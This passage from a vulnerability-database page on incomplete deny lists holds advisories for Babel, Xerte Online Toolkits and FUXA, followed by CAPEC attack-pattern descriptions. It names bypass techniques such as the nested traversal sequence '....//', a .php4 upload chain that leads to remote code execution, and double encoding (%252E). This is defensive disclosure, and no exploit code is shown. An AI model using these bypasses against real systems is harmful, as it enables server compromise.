No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.

Users that only compile trusted code are not impacted.

Patches

The vulnerability has been fixed in @babel/traverse@7.23.2.

Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.

Workarounds

  • Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
  • If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
  • @babel/plugin-transform-runtime v7.23.2
  • @babel/preset-env v7.23.2
  • @babel/helper-define-polyfill-provider v0.4.3
  • babel-plugin-polyfill-corejs2 v0.4.6
  • babel-plugin-polyfill-corejs3 v0.8.5
  • babel-plugin-polyfill-es-shims v0.10.0
  • babel-plugin-polyfill-regenerator v0.5.3
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@babel/traverse"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.23.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@babel/traverse"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0-alpha.0"
            },
            {
              "fixed": "8.0.0-alpha.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 7.23.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "babel-traverse"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-45133"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-697"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-16T13:55:36Z",
    "nvd_published_at": "2023-10-12T17:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nUsing Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the `path.evaluate()`or `path.evaluateTruthy()` internal Babel methods.\n\nKnown affected plugins are:\n- `@babel/plugin-transform-runtime`\n- `@babel/preset-env` when using its [`useBuiltIns`](https://babeljs.io/docs/babel-preset-env#usebuiltins) option\n- Any \"polyfill provider\" plugin that depends on `@babel/helper-define-polyfill-provider`, such as `babel-plugin-polyfill-corejs3`, `babel-plugin-polyfill-corejs2`, `babel-plugin-polyfill-es-shims`, `babel-plugin-polyfill-regenerator`\n\nNo other plugins under the `@babel/` namespace are impacted, but third-party plugins might be.\n\n**Users that only compile trusted code are not impacted.**\n\n### Patches\n\nThe vulnerability has been fixed in `@babel/traverse@7.23.2`.\n\nBabel 6 does not receive security fixes anymore (see [Babel\u0027s security policy](https://github.com/babel/babel/security/policy)), hence there is no patch planned for `babel-traverse@6`.\n\n### Workarounds\n\n- Upgrade `@babel/traverse` to v7.23.2 or higher. You can do this by deleting it from your package manager\u0027s lockfile and re-installing the dependencies. `@babel/core` \u003e=7.23.2 will automatically pull in a non-vulnerable version.\n- If you cannot upgrade `@babel/traverse` and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected `@babel/traverse` versions:\n  - `@babel/plugin-transform-runtime` v7.23.2\n  - `@babel/preset-env` v7.23.2\n  - `@babel/helper-define-polyfill-provider` v0.4.3\n  - `babel-plugin-polyfill-corejs2` v0.4.6\n  - `babel-plugin-polyfill-corejs3` v0.8.5\n  - `babel-plugin-polyfill-es-shims` v0.10.0\n  - `babel-plugin-polyfill-regenerator` v0.5.3",
  "id": "GHSA-67hx-6x53-jw92",
  "modified": "2024-04-04T14:26:10Z",
  "published": "2023-10-16T13:55:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45133"
    },
    {
      "type": "WEB",
      "url": "https://github.com/babel/babel/pull/16033"
    },
    {
      "type": "WEB",
      "url": "https://github.com/babel/babel/commit/b13376b346946e3f62fc0848c1d2a23223314c82"
    },
    {
      "type": "WEB",
      "url": "https://babeljs.io/blog/2023/10/16/cve-2023-45133"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/babel/babel"
    },
    {
      "type": "WEB",
      "url": "https://github.com/babel/babel/releases/tag/v7.23.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/babel/babel/releases/tag/v8.0.0-alpha.4"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00026.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2023/dsa-5528"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code"
}

GHSA-67J3-R63P-59HF

Vulnerability from github – Published: 2026-04-22 21:32 – Updated: 2026-04-24 21:31
VLAI
Details

Xerte Online Toolkits versions 3.15 and earlier contain an incomplete input validation vulnerability in the elFinder connector endpoint that fails to block PHP-executable extensions .php4 due to an incorrect regex pattern. Unauthenticated attackers can exploit this flaw combined with authentication bypass and path traversal vulnerabilities to upload malicious PHP code, rename it with a .php4 extension, and execute arbitrary operating system commands on the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-34415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-22T19:17:04Z",
    "severity": "CRITICAL"
  },
  "details": "Xerte Online Toolkits versions 3.15 and earlier contain an incomplete input validation vulnerability in the elFinder connector endpoint that fails to block PHP-executable extensions .php4 due to an incorrect regex pattern. Unauthenticated attackers can exploit this flaw combined with authentication bypass and path traversal vulnerabilities to upload malicious PHP code, rename it with a .php4 extension, and execute arbitrary operating system commands on the server.",
  "id": "GHSA-67j3-r63p-59hf",
  "modified": "2026-04-24T21:31:59Z",
  "published": "2026-04-22T21:32:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34415"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thexerteproject/xerteonlinetoolkits/issues/1527"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thexerteproject/xerteonlinetoolkits/commit/02661be88cc369325ea01b508086bde7fbfec805"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thexerteproject/xerteonlinetoolkits/commit/17e4f945fe6a3400fa88c01eda18c1075ee4a212"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thexerteproject/xerteonlinetoolkits/commit/507d55c5e91bf9310b5b1c7fad8aebfef902ad23"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bootstrapbool/xerteonlinetoolkits-rce"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/xerte-online-toolkits-file-upload-rce-via-elfinder-connector"
    },
    {
      "type": "WEB",
      "url": "https://xerte.org.uk/index.php/en/downloads-1/category/3-xerte-online-toolkits"
    },
    {
      "type": "WEB",
      "url": "https://xerte.org.uk/xertetoolkits_3.15_ChangeLog.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-68M5-5W2H-H837

Vulnerability from github – Published: 2026-02-10 00:29 – Updated: 2026-02-10 14:18
VLAI
Summary
FUXA Affected by a Path Traversal Sanitization Bypass
Details

Summary

A flaw in the path sanitization logic allows an authenticated attacker with administrative privileges to bypass directory traversal protections. By using nested traversal sequences (e.g., ....//), an attacker can write arbitrary files to the server filesystem, including sensitive directories like runtime/scripts. This leads to Remote Code Execution (RCE) when the server reloads the malicious scripts. It is a new vulnerability a patch bypass for the sanitization in the last release .

Details

This report describes a new, distinct vulnerability that differs from previous Path Traversal advisories (such as CVE-2023-31718) in several ways:

Patch Bypass (Regression): The vulnerability circumvents the existing sanitization logic implemented to fix previous traversal issues. The current "single-pass" regex approach is insufficient against nested sequences. Expansion of Scope: Unlike previous reports that focused primarily on /api/download, this bypass affects multiple critical endpoints, including /api/upload, /api/resources/remove, and /api/logs. Escalation to RCE: By targeting the upload and remove functionalities, this vulnerability directly leads to Remote Code Execution, which is a higher impact than the information disclosure typically associated with previous traversal reports.

Impact

Remote Code Execution (RCE): Transition from application admin to full system control. SCADA Operational Disruption: Potential for physical or operational sabotage by manipulating tags and alarms. Data Integrity & Availability: Full access to projects, credentials, and historical logs.

Patches

This issue has been patched in FUXA version 1.2.11. Users are strongly encouraged to update to the latest available release.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.2.10"
      },
      "package": {
        "ecosystem": "npm",
        "name": "fuxa-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25951"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:29:00Z",
    "nvd_published_at": "2026-02-09T23:16:06Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA flaw in the path sanitization logic allows an authenticated attacker with administrative privileges to bypass directory traversal protections. By using nested traversal sequences (e.g., ....//), an attacker can write arbitrary files to the server filesystem, including sensitive directories like runtime/scripts. This leads to Remote Code Execution (RCE) when the server reloads the malicious scripts. It is a new vulnerability a patch bypass for the sanitization in the last release .\n\n\n### Details\nThis report describes a new, distinct vulnerability that differs from previous Path Traversal advisories (such as CVE-2023-31718) in several ways:\n\nPatch Bypass (Regression): The vulnerability circumvents the existing sanitization logic implemented to fix previous traversal issues. The current \"single-pass\" regex approach is insufficient against nested sequences.\nExpansion of Scope: Unlike previous reports that focused primarily on /api/download, this bypass affects multiple critical endpoints, including /api/upload, /api/resources/remove, and /api/logs.\nEscalation to RCE: By targeting the \nupload\n and remove functionalities, this vulnerability directly leads to Remote Code Execution, which is a higher impact than the information disclosure typically associated with previous traversal reports.\n\n\n### Impact\nRemote Code Execution (RCE): Transition from application admin to full system control.\nSCADA Operational Disruption: Potential for physical or operational sabotage by manipulating tags and alarms.\nData Integrity \u0026 Availability: Full access to projects, credentials, and historical logs.\n\n### Patches\n\nThis issue has been patched in FUXA version 1.2.11. Users are strongly encouraged to update to the latest available release.",
  "id": "GHSA-68m5-5w2h-h837",
  "modified": "2026-02-10T14:18:49Z",
  "published": "2026-02-10T00:29:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-68m5-5w2h-h837"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25951"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/pull/2177"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/commit/3ecce46333ed33e3f66f378e38e317cde702b0ae"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/commit/f7a9f04b2ab97ab5421e4ec4e711c51e9f4b65c8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/frangoteam/FUXA"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/releases/tag/v1.2.11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FUXA Affected by a Path Traversal Sanitization Bypass"
}

Mitigation
Implementation

Strategy: Input Validation

Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

CAPEC-120: Double Encoding

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-182: Flash Injection

An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.

CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters

Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-6: Argument Injection

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

CAPEC-71: Using Unicode Encoding to Bypass Validation Logic

An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.